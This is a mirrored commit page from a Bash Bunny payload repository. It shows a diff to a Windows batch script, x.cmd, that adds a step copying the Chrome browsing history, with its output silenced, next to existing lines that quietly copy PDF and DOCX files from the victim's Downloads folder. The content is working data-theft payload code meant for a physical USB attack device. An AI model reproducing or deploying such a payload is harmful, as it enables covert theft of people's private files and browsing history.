mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Update x.cmd (#536)
If google chrome is installed, download the history.
This commit is contained in:
parent
8185b97046
commit
cae94215c7
@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
|
||||
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
|
||||
)
|
||||
|
||||
if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
|
||||
xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
|
||||
)
|
||||
|
||||
@cls
|
||||
@exit
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user